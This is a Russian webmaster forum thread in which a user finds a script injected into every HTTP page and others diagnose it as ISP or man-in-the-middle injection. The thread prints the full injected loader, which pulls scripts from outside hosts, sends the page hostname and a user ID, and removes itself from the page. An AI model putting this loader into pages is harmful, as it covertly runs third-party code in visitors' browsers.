Правила     Закладки     Карма    Календарь    Журналы    Помощь    Поиск    PDA    Чат   
        СМС-ки
   
Пейджер выключен!
Страницы: (2) [1] 2  ( Перейти к первому непрочитанному сообщению )  
Фильтр авторов:    показать 
  скрыть
  Ответ в темуСоздание новой темыСоздание опроса

> Не пойму откуда эта ссылка
Astin  
 ۩  Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Форумчанин
Завсегдатай форума
Сообщений: 592
Пользователь №: 42519
На форуме: 11 месяцев, 7 дней
Карма: 7




Приветствую Всех!

Заметил такую фигню, когда открываешь исходный код сайта в браузере
внизу появляется код с ссылкой на скрипт перед закрывающим тегом
body. На моих сайтах этих ссылок нет.
Просматриваю любой другой сайт тоже стоит ссылка.
Не пойму, может что Хром добавляет автоматом сам

Вот такая вот штука появляется
<script src="http://msmdzbsyrw.org/app/code/code.php?appid=ins00-7132-1461413501764-45377954-f951-4dcb-9811-60ff98d9fae0&h=0&m=normal" id="ubar-loader">
</script>

Может кто знает что это за фигня
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
redreem  
Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Форумчанин
Завсегдатай форума
Сообщений: 4273
Пользователь №: 29002
На форуме: 5 лет, 5 месяцев, 18 дней
Карма: 147




провайдер спамит smile.gif
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
Astin  
 ۩  Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Форумчанин
Завсегдатай форума
Сообщений: 592
Пользователь №: 42519
На форуме: 11 месяцев, 7 дней
Карма: 7




Цитата (redreem @ 28.04.2016 - 18:29)
провайдер спамит smile.gif

Ну так с этим что нибудь надо делать или не обращать внимание.

PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
redreem  
Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Форумчанин
Завсегдатай форума
Сообщений: 4273
Пользователь №: 29002
На форуме: 5 лет, 5 месяцев, 18 дней
Карма: 147




на хабре куча статей по этому поводу.
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
Astin  
 ۩  Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Форумчанин
Завсегдатай форума
Сообщений: 592
Пользователь №: 42519
На форуме: 11 месяцев, 7 дней
Карма: 7




Цитата (redreem @ 28.04.2016 - 18:50)
на хабре куча статей по этому поводу.

Ну так скажи тогда что конкретно искать,

какую тему?
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
redreem  
Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Форумчанин
Завсегдатай форума
Сообщений: 4273
Пользователь №: 29002
На форуме: 5 лет, 5 месяцев, 18 дней
Карма: 147




ну вот например https://habrahabr.ru/post/262631/
другие темы по тегам там уж посмотри.
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
Astin  
 ۩  Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Форумчанин
Завсегдатай форума
Сообщений: 592
Пользователь №: 42519
На форуме: 11 месяцев, 7 дней
Карма: 7




Цитата
ну вот например https://habrahabr.ru/post/262631/
другие темы по тегам там уж посмотри.


redreem Спасибо за ссылку, очень интересно. Я вот кстати пользуюсь
билайн, но хочу сменить его.

А вообще в ссылке на скрипт нет даже намека на билайн

Вот сам скрипт
void function(){if(window.self!==window.top)return;var pid='ins00',uid='45377954-f951-4dcb-9811-60ff98d9fae0',osid='7132',ts=1461413501764,h=0;var extadActive = (Date.now() - ts > 7200000) ? 1 : 0;
inject('//msmdzbsyrw.org/app/noext/main.php?pid=' + pid + '&eid=2&uid=' + uid + '&host=' + location.hostname + '&active=' + extadActive + '&extad_init=' + (window.EXTADinit ? 1 : 0)+'&h='+h);
location.hostname === 'www.youtube.com' && inject('https://www.u-bar.org/js/download.js');

removeSelf();

function removeSelf() {
var scr=document.getElementById('ubar-loader')||document.getElementById('videoplugin-loader');
scr&&tryToRemove(scr);
}

function inject(src){
var scr=document.createElement('script');
scr.src=src;
scr.onload=scr.onerror=function(){setTimeout(function(){tryToRemove(scr)},0)};
document.body.appendChild(scr);
}

function tryToRemove(node){try{node.parentNode.removeChild(node)}catch(ex){}}
}();


Вот эта строчка кода
inject('https://www.u-bar.org/js/download.js');


Вроде как ведет на загрузку приложения

Само приложение u-bar.org позволяет отключать всю рекламу в браузере.

Мне кажется что это не билайн, а сам гугл, а может и билайн.

Вот просмотрел сайт через Оперу и тоже есть в сайтах эта ссылка на скрипт

Как от нее избавиться не знаю?

Нашел сервис u-bar.org, перешел на него и он выдает окно
для загрузки приложения

Вот скрин http://itmages.ru/image/view/4207989/eb66151c

_




PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
Миша  
Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: ★ЛжеЭксперт★
Завсегдатай форума
Сообщений: 2544
Пользователь №: 37963
На форуме: 3 года, 5 месяцев, 8 дней
Карма: 27




В общем смирись или поменяй провайдера.

Сделать с этим ты ничего не сможешь, потому что данные прилетают именно от провайдера и обойти это можно только сменив его.

Ну или использовать ПО, которое будет блокировать подобное, но стороннему ПО я не доверяю.


--------------------
Болтовня ничего не стоит. Покажите мне код.
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
Ron  
Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Форумчанин
Завсегдатай форума
Сообщений: 1109
Пользователь №: 41686
На форуме: 1 год, 5 месяцев, 9 дней
Карма: 19




Цитата (Медведь @ 29.04.2016 - 08:16)
обойти это можно только сменив его.

Нет, это неправда. Можно обойти с помощью любого туннеля.


--------------------
Жду 5.11.2017
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
killer8080  
Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Эксперт
Группа переписки
Сообщений: 8832
Пользователь №: 26630
На форуме: 5 лет, 10 месяцев, 16 дней
Карма: 598




Astin
проверь настройки DNS, возможно тебя завирусили.
Попробуй ручками настроить на 8.8.8.8

Это сообщение отредактировал killer8080 - 29.04.2016 - 09:27
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
Guest  
Дата
Цитировать сообщение


Гость пожелал остаться неизвестным

Unregistered









Цитата
проверь настройки DNS, возможно тебя завирусили.
Попробуй ручками настроить на 8.8.8.8

killer8080 попробывал поменять DNS на компе, но при повторном подключении
все встает на прежнее место.

Может я что не так делаю....

Вроде ничего такого левого не качал с нета, плюс стоит ативирус NOD32.
Он конкретно все ненужное и нужное блокирует.

    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
Миша  
Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: ★ЛжеЭксперт★
Завсегдатай форума
Сообщений: 2544
Пользователь №: 37963
На форуме: 3 года, 5 месяцев, 8 дней
Карма: 27




Цитата (Ron @ 29.04.2016 - 09:08)
Цитата (Медведь @ 29.04.2016 - 08:16)
обойти это можно только сменив его.

Нет, это неправда. Можно обойти с помощью любого туннеля.

Ты имеешь ввиду отправлять все запросы одному серверу, а он будет дёргать сайты, которые ты ему скажешь? Но это подходит только для сёрфинга.
Цитата
но стороннему ПО я не доверяю.

Иначе поднимать свой сервер, а стоит ли игра свеч ?)


--------------------
Болтовня ничего не стоит. Покажите мне код.
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
killer8080  
Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Эксперт
Группа переписки
Сообщений: 8832
Пользователь №: 26630
На форуме: 5 лет, 10 месяцев, 16 дней
Карма: 598




Цитата (Guest @ 29.04.2016 - 10:09)
killer8080 попробывал поменять DNS на компе, но при повторном подключении
все встает на прежнее место.

Может я что не так делаю....

ну ты же можешь в настройках tcp/ip прописать DNS жёстко, другое дело, что неизвестно как реализована MITM, может публичные ДНСы спуфятся. По https код не внедряется? https вообще работает, не ругается на сертификаты?
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
Astin  
 ۩  Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Форумчанин
Завсегдатай форума
Сообщений: 592
Пользователь №: 42519
На форуме: 11 месяцев, 7 дней
Карма: 7




Но вот если перейти по ссылки из скрипта https://www.u-bar.org

То пишет
Цитата
Ваше подключение не защищено

Злоумышленники могут пытаться похитить ваши данные с сайта www.u-bar.org (например, пароли, сообщения или номера банковских карт).


А если перейти на нормальный сайт с https то все нормально, но этого скрипта нет.

Переходишь на сайт с протоколом http появляется скрипт при просмотре
кода страницы
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
killer8080  
Дата
Цитировать сообщение

Пользователя сейчас нет на форуме



Здесь живет
******

Профиль
Группа: Эксперт
Группа переписки
Сообщений: 8832
Пользователь №: 26630
На форуме: 5 лет, 10 месяцев, 16 дней
Карма: 598




Цитата (Astin @ 29.04.2016 - 10:52)
Но вот если перейти по ссылки из скрипта https://www.u-bar.org

То пишет

у них сертификат просрочен
Цитата (Astin @ 29.04.2016 - 10:52)
А если перейти на нормальный сайт с https то все нормально, но этого скрипта нет.

значит атака идёт только на не защищённые соединения, так что там с ДНС-ами? Есть подмена?
PMПисьмо на e-mail пользователю
    0   Для быстрого поиска похожих сообщений выделите 1-2 слова в тексте и нажмите сюда Для быстрой цитаты из этого сообщения выделите текст и нажмите сюда
  Быстрый ответ
Информация о Госте
Введите Ваше имя
Кнопки кодов
Для вставки цитаты, выделите нужный текст и
НАЖМИТЕ СЮДА
Введите сообщение
Смайлики
:huh:  :o  ;) 
:P  :D  :lol: 
B)  :rolleyes:  <_< 
:)  :angry:  :( 
:unsure:  :blink:  :ph34r: 
     
Показать всё

Опции сообщения  Включить смайлики?
 Включить подпись?
 
1 Пользователей читают эту тему (1 Гостей и 0 Скрытых Пользователей)
0 Пользователей:

Опции темыСтраницы: (2) [1] 2  Ответ в темуСоздание новой темыСоздание опроса